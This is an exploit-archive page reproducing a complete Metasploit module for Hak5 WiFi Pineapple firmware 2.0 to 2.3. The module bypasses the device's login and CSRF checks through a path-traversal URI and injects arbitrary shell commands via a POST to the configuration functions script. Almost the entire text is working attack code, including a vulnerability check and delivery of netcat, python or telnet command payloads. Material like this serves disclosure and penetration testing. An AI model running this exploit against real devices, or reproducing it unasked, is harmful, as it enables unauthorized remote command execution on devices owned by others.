Hak5 WiFi Pineapple Preconfiguration Command Injection

2016.10.19
Credit: catatonicprime
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Hak5 WiFi Pineapple Preconfiguration Command Injection', 'Description' => %q{ This module exploits a login/csrf check bypass vulnerability on WiFi Pineapples version 2.0 <= pineapple < 2.4. These devices may typically be identified by their SSID beacons of 'Pineapple5_....'; Provided as part of the TospoVirus workshop at DEFCON23. }, 'Author' => ['catatonicprime'], 'License' => MSF_LICENSE, 'References' => [ ], 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Privileged' => false, 'Payload' => { 'Space' => 2048, 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic python netcat telnet' } }, 'Targets' => [ [ 'WiFi Pineapple 2.0.0 - 2.3.0', {} ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Aug 1 2015')) register_options( [ OptString.new('TARGETURI', [ true, 'Path to the command injection', '/components/system/configuration/functions.php' ]), Opt::RPORT(1471), Opt::RHOST('172.16.42.1') ] ) deregister_options( 'ContextInformationFile', 'DOMAIN', 'DigestAuthIIS', 'EnableContextEncoding', 'FingerprintCheck', 'HttpClientTimeout', 'NTLM::SendLM', 'NTLM::SendNTLM', 'NTLM::SendSPN', 'NTLM::UseLMKey', 'NTLM::UseNTLM2_session', 'NTLM::UseNTLMv2', 'SSL', 'SSLVersion', 'VERBOSE', 'WORKSPACE', 'WfsDelay', 'Proxies', 'VHOST' ) end def cmd_uri normalize_uri('includes', 'css', 'styles.php', '../../..', target_uri.path) end def cmd_inject(cmd) res = send_request_cgi( 'method' => 'POST', 'uri' => cmd_uri, 'vars_get' => { 'execute' => "" # Presence triggers command execution }, 'vars_post' => { 'commands' => cmd }) res end def check res = cmd_inject("echo") if res && res.code == 200 && res.body =~ /Executing/ return Exploit::CheckCode::Vulnerable end Exploit::CheckCode::Safe end def exploit print_status('Attempting to bypass login/csrf checks...') unless check fail_with(Failure::NoAccess, 'Failed to bypass login/csrf check...') end print_status('Executing payload...') cmd_inject("#{payload.encoded}") end end


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top